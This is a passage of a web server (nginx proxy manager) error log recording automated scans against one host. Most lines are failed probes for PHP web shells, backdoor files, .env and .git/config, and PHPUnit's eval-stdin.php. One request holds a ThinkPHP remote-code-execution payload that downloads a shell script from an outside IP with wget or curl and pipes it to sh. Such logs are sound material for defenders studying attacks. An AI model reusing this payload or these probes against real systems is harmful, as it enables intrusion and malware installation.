localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/ty226.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ty226.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/webadmin.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /webadmin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/hans.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /hans.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/wp-ana.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-ana.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/tx1.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /tx1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/yvxhx.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /yvxhx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /manager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/qing2.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /qing2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/doo.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /doo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /moon.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /buy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/9v6.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /9v6.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/dbc.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /dbc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /log.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:52 [error] 323#323: *2389 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /shell20211028.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/rh.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /rh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/siteheads.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /siteheads.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/wp-links.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-links.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/zer.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /zer.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/sid3.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /sid3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/ant.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ant.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/O-Simple.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /O-Simple.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/0o0.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /0o0.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /content.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/support.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /support.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/styles.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /styles.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /goods.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/wp-content/themes/finley/min.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/finley/min.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/class.api.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /class.api.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/155.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /155.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:53 [error] 323#323: *2389 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/horeg.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /horeg.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/sfudq.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /sfudq.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/wp-22.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-22.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/asx.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /asx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/dox.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /dox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/ng.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ng.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/page.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /page.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/sf.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /sf.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/qual.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /qual.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /12.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/s.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /s.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/11.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /11.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/wp-admin/css/colors/about.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:54 [error] 323#323: *2389 open() "/var/www/html/wp-includes/Text/about.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/past.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /past.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/revision.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /revision.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/baxa1.phP8" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /baxa1.phP8 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/massby2.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /massby2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/wp-admin/images/admin.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/mh.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /mh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /ws46.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/gecko.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /gecko.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:55 [error] 323#323: *2389 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 06:02:19 [error] 324#324: *2429 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 06:04:16 [error] 324#324: *2441 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 06:51:17 [error] 325#325: *2567 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 06:53:15 [error] 325#325: *2570 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 07:04:41 [error] 325#325: *2602 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 07:36:17 [error] 324#324: *4174 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:36:17 [error] 324#324: *4175 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:36:17 [error] 324#324: *4176 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:37:46 [error] 324#324: *4181 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 07:40:12 [error] 326#326: *4184 open() "/var/www/html/.env" failed (2: No such file or directory), client: 104.248.247.114, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:40:12 [error] 326#326: *4185 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 104.248.247.114, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:48:03 [error] 326#326: *4194 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 172.202.117.178, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/23 07:48:06 [error] 323#323: *4195 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 08:16:07 [error] 326#326: *5716 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 167.94.146.50, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "91.82.83.208" +2026/01/23 08:25:10 [error] 323#323: *5751 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 08:34:40 [error] 323#323: *5765 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 09:11:11 [error] 325#325: *5796 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 09:24:57 [error] 325#325: *5809 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 10:01:39 [error] 325#325: *5841 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 10:37:55 [error] 332#332: *5875 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 40.124.175.174, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "91.82.83.208" +2026/01/23 10:51:43 